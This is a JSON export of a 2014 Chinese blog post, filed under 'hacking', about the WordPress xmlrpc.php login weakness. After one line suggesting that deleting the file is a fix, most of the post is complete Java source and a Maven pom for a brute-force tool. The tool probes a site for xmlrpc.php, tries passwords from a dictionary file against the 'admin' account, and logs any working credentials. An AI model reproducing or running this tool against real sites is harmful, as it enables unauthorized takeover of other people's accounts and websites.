{"id":952,"date":"2014-08-02T17:42:57","date_gmt":"2014-08-02T09:42:57","guid":{"rendered":"http:\/\/www.yeetrack.com\/?p=952"},"modified":"2014-08-02T17:42:57","modified_gmt":"2014-08-02T09:42:57","slug":"wordpress-xmlrpc-php%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"https:\/\/www.yeetrack.com\/?p=952","title":{"rendered":"WordPress xmlrpc.php\u66b4\u529b\u7834\u89e3\u6f0f\u6d1e"},"content":{"rendered":"

wordpress\u662f\u5f88\u6d41\u884c\u7684\u5f00\u6e90\u535a\u5ba2\uff0c\u5b83\u63d0\u4f9b\u8fdc\u7a0b\u53d1\u5e03\u6587\u7ae0\u7684\u65b9\u6cd5\uff0c\u5c31\u662f\u4f7f\u7528\u8ddf\u8def\u5f84\u7684xmlrpc.php<\/strong>\u8fd9\u4e2a\u6587\u4ef6\uff0c\u6700\u8fd1\u7206\u51faxmlrpc\u6f0f\u6d1e\uff0c\u6f0f\u6d1e\u539f\u7406\u662f\u901a\u8fc7xmlrpc\u8fdb\u884c\u8ba4\u8bc1\uff0c\u5373\u4f7f\u8ba4\u8bc1\u5931\u8d25\uff0c\u4e5f\u4e0d\u4f1a\u88abWordpress\u5b89\u88c5\u7684\u5b89\u5168\u63d2\u4ef6\u8bb0\u5f55\uff0c\u6240\u4ee5\u4e0d\u4f1a\u89e6\u53d1\u5bc6\u7801\u8f93\u9519N\u6b21\u88ab\u9501\u5b9a\u7684\u60c5\u51b5\u3002\u56e0\u6b64\u5c31\u53ef\u80fd\u88ab\u66b4\u529b\u7834\u89e3\uff0c\u5982\u679c\u5bc6\u7801\u53c8\u662f\u5f31\u53e3\u4ee4\u7684\u8bdd\uff0c\u5c31\u76f8\u5f53\u5371\u9669\u4e86\u3002\u6700\u7b80\u5355\u7684\u89e3\u51b3\u529e\u6cd5\uff0c\u5c31\u662f\u5220\u9664xmlrpc.php<\/strong>\u8fd9\u4e2a\u6587\u4ef6\u3002\u95f2\u6765\u65e0\u4e8b\uff0c\u7528java\u5199\u4e86\u66b4\u529b\u7834\u89e3\u7684\u811a\u672c\uff0c\u5176\u5b9e\u5c31\u662f\u62ff\u7740\u5404\u79cd\u7528\u6237\u540d\u3001\u5bc6\u7801\u53bb\u4e0d\u65ad\u8c03\u7528<\/strong>xmlrpc.phpp\u8fd9\u4e2a\u6587\u4ef6\uff0c\u68c0\u6d4b\u8ba4\u8bc1\u7ed3\u679c\uff0c\u5f88\u7b80\u5355\u3002\u53ea\u4e3a\u5a31\u4e50\uff0c\u66b4\u529b\u7834\u89e3\u7684\u4e8b\u60c5\uff0c\u5927\u5bb6\u614e\u91cd\u3002<\/p>\n

Xmlrpc.java<\/strong>\u6e90\u7801\u5982\u4e0b\uff1a<\/p>\n

    package com.yeetrack.security.wordpress;\n\n    import org.apache.http.client.ClientProtocolException;\n    import org.apache.http.client.config.RequestConfig;\n    import org.apache.http.client.methods.CloseableHttpResponse;\n    import org.apache.http.client.methods.HttpGet;\n    import org.apache.http.client.methods.HttpPost;\n    import org.apache.http.entity.StringEntity;\n    import org.apache.http.impl.client.CloseableHttpClient;\n    import org.apache.http.impl.client.HttpClients;\n    import org.apache.http.util.EntityUtils;\n    import org.slf4j.Logger;\n    import org.slf4j.LoggerFactory;\n    import org.testng.annotations.Test;\n\n    import java.io.*;\n\n    \/**\n     * Created by victor wang on 2014\/8\/2.\n     * \u5229\u7528wordpress xmlrpc\u6f0f\u6d1e\uff0c\u66b4\u529b\u7834\u89e3\u5bc6\u7801\n     *\/\n    public class Xmlrpc\n    {\n        private String userAgent = \"Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko\/20100101 Firefox\/31.0\";\n        RequestConfig requestConfig = RequestConfig.custom().setConnectionRequestTimeout(4000).setConnectTimeout(4000)\n                .setSocketTimeout(4000).build();\n        private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class);\n        private CloseableHttpClient httpClient = HttpClients.custom()\n                .setUserAgent(userAgent)\n                .setDefaultRequestConfig(requestConfig)\n                .build();\n\n        \/**\n         * \u6821\u9a8c\u57df\u540d\u662f\u5426\u5b58\u5728xmlrpc.php\u8fd9\u4e2a\u6587\u4ef6\n         *\/\n        private boolean checkXmlRpcFile(String domain)\n        {\n            domain = wrapperUrl(domain);\n            if(domain==null)\n                return false;\n            HttpGet get = new HttpGet(\"http:\/\/\"+domain+\"\/xmlrpc.php\");\n            get.addHeader(\"User-Agent\", userAgent);\n            CloseableHttpResponse response = null;\n            String resultString = null;\n            try {\n                response = httpClient.execute(get);\n                if(null == response || response.equals(\"\"))\n                    return false;\n                resultString = EntityUtils.toString(response.getEntity());\n            } catch (IOException e) {\n                e.printStackTrace();\n            }\n\n            return resultString.contains(\"XML-RPC server accepts POST requests only.\");\n        }\n\n        \/**\n         * \u66b4\u529b\u5c1d\u8bd5\n         *\/\n        private boolean forceLogin(String username, String password, String url)\n        {\n            \/\/\u5c1d\u8bd5\u767b\u5f55\n            HttpPost post = new HttpPost(\"http:\/\/\"+wrapperUrl(url)+\"\/xmlrpc.php\");\n            post.addHeader(\"User-Agent\", userAgent);\n            String xmlString = \"<?xml version=\\\"1.0\\\" encoding=\\\"iso-8859-1\\\"?><methodCall>  <methodName>wp.getUsersBlogs<\/methodName>  <params>   <param><value>\"+username+\"<\/value><\/param>   <param><value>\"+password+\"<\/value><\/param>  <\/params><\/methodCall>\";\n            StringEntity entity = null;\n            try {\n                entity = new StringEntity(xmlString);\n                post.setEntity(entity);\n                CloseableHttpResponse response = httpClient.execute(post);\n                String loginResult = EntityUtils.toString(response.getEntity());\n                if(null== loginResult || loginResult.equals(\"\"))\n                    return false;\n                if(loginResult.contains(\"isAdmin\")) {\n                    logger.info(url + \"\u767b\u5f55\u6210\u529f\uff0cuserename--->\" + username + \"  password--->\" + password);\n                    return true;\n                }\n            } catch (UnsupportedEncodingException e) {\n                e.printStackTrace();\n            } catch (ClientProtocolException e) {\n                e.printStackTrace();\n            } catch (IOException e) {\n                e.printStackTrace();\n            }\n\n            return false;\n        }\n        \/**\n         * \u51c0\u5316url\uff0c\u53bb\u6389http:\/\/\u6216\u8005\u672b\u5c3e\u7684path\n         *\/\n        private String wrapperUrl(String url)\n        {\n            if(null == url || url.equals(\"\"))\n                return null;\n            if(url.startsWith(\"http:\/\/\"))\n                url = url.substring(7);\n            if(url.contains(\"\/\"))\n                url = url.substring(0, url.indexOf(\"\/\"));\n            return url;\n        }\n\n        \/**\n         * \u7834\u89e3\n         *\/\n        @Test\n        public void test()\n        {\n            String url = \"http:\/\/somewordpress.com\/xmlrpc.php\";\n            if(!checkXmlRpcFile(url)) {\n                logger.info(url+\"--->\u4e0d\u5b58\u5728xmlrpc\u6f0f\u6d1e\");\n                return;\n            }\n            File file = new File(\"src\/main\/resources\/1pass00.txt\"); \/\/\u5bc6\u7801\u5b57\u5178\uff0c\u8fd9\u4e2a\u7f51\u4e0a\u4e00\u5806\u4e00\u5806\u7684\uff0c\u6216\u8005\u81ea\u5df1\u751f\u6210\u4e5f\u53ef\n\n\n            try {\n                FileReader fileReader = new FileReader(file);\n                BufferedReader bufferedReader = new BufferedReader(fileReader);\n                String line = null;\n                int count = 1;\n                while ((line = bufferedReader.readLine()) != null) {\n                    System.out.println(\"\" + count + \"  \" + line);\n                    if(forceLogin(\"admin\", line, url))\n                        break;\n                    count++;\n                    \/\/Thread.sleep(500);\n                }\n            } catch (Exception e) { e.printStackTrace(); }\n\n        }\n    }\n<\/code><\/pre>\n
\u9879\u76ee\u4f7f\u7528maven\u7ba1\u7406\uff0c\u4f7f\u7528\u4e86apache\u7684httpclient\u548clog4j\uff0cpom.xml<\/strong>\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
    <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n    <project xmlns=\"http:\/\/maven.apache.org\/POM\/4.0.0\"\n             xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n             xsi:schemaLocation=\"http:\/\/maven.apache.org\/POM\/4.0.0 http:\/\/maven.apache.org\/xsd\/maven-4.0.0.xsd\">\n        <modelVersion>4.0.0<\/modelVersion>\n\n        <groupId>com.yeetrack.security<\/groupId>\n        <artifactId>wordpress-xmlrpc<\/artifactId>\n        <version>1.0-SNAPSHOT<\/version>\n\n        <dependencies>\n            <dependency>\n                <groupId>org.apache.httpcomponents<\/groupId>\n                <artifactId>httpclient<\/artifactId>\n                <version>4.4-alpha1<\/version>\n            <\/dependency>\n            <dependency>\n                <groupId>org.apache.httpcomponents<\/groupId>\n                <artifactId>httpmime<\/artifactId>\n                <version>4.4-alpha1<\/version>\n            <\/dependency>\n            <dependency>\n                <groupId>org.testng<\/groupId>\n                <artifactId>testng<\/artifactId>\n                <version>6.8.8<\/version>\n            <\/dependency>\n            <dependency>\n                <groupId>org.slf4j<\/groupId>\n                <artifactId>slf4j-log4j12<\/artifactId>\n                <version>1.7.7<\/version>\n            <\/dependency>\n        <\/dependencies>\n    <\/project><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
wordpress\u662f\u5f88\u6d41\u884c\u7684\u5f00\u6e90\u535a\u5ba2\uff0c\u5b83\u63d0\u4f9b\u8fdc\u7a0b\u53d1\u5e03\u6587\u7ae0\u7684\u65b9\u6cd5\uff0c\u5c31\u662f\u4f7f\u7528\u8ddf\u8def\u5f84\u7684xmlrpc.php\u8fd9\u4e2a\u6587\u4ef6\uff0c\u6700\u8fd1\u7206\u51faxmlrpc\u6f0f\u6d1e\uff0c\u6f0f\u6d1e\u539f\u7406\u662f\u901a\u8fc7xmlrpc\u8fdb\u884c\u8ba4\u8bc1\uff0c\u5373\u4f7f\u8ba4\u8bc1\u5931\u8d25\uff0c\u4e5f\u4e0d\u4f1a\u88abWor...<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"pgc_sgb_lightbox_settings":"","footnotes":""},"categories":[35],"tags":[25,26,5,29],"class_list":["post-952","post","type-post","status-publish","format-standard","hentry","category-hacking","tag-wordpress","tag-26","tag-5","tag-29"],"views":16266,"_links":{"self":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts\/952","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=952"}],"version-history":[{"count":1,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts\/952\/revisions"}],"predecessor-version":[{"id":953,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts\/952\/revisions\/953"}],"wp:attachment":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=952"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=952"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=952"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}